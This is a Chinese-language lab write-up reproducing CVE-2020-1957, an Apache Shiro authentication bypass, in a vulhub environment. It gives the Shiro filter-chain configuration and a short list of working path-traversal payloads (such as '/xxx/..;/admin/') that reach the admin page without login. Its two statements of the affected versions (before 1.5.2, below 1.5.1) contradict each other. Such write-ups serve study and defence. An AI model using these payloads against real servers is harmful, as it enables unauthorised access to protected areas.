CVE-2020-1957 Apache Shiro认证绕过漏洞
0X00-引言
走过多少路,见识到多少人生,懂得了多少道理,敢如何去评论别人对错。
0X01-环境搭建
靶机:CentOS Linux 7
攻击机:windows server 2016 && Kail
环境:vulhub
工具:burpsuite
项目地址:https://github.com/vulhub/vulhub
搭建vulhub请访问:空白centos7 64 搭建vulhub(详细)
0X02-漏洞描述
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。
在Apache Shiro 1.5.2以前的版本中,在使用Spring动态控制器时,攻击者通过构造..;
这样的跳转,可以绕过Shiro中对目录的权限限制。
这个应用中对URL权限的配置如下:
@Bean
public ShiroFilterChainDefinition shiroFilterChainDefinition() {
DefaultShiroFilterChainDefinition chainDefinition = new DefaultShiroFilterChainDefinition();
chainDefinition.addPathDefinition("/login.html", "authc"); // need to accept POSTs from the login form
chainDefinition.addPathDefinition("/logout", "logout");
chainDefinition.addPathDefinition("/admin/**", "authc");
return chainDefinition;
}
影响版本:Apache Shiro < 1.5.1
0X03-漏洞复现
burp抓包-构造url访问管理页面-重定向到登录页面
构造恶意请求-成功绕过
payload集合:
;/admin/
/;/admin/
/xxx/..;/admin/
0X04-免责声明
仅供学习参考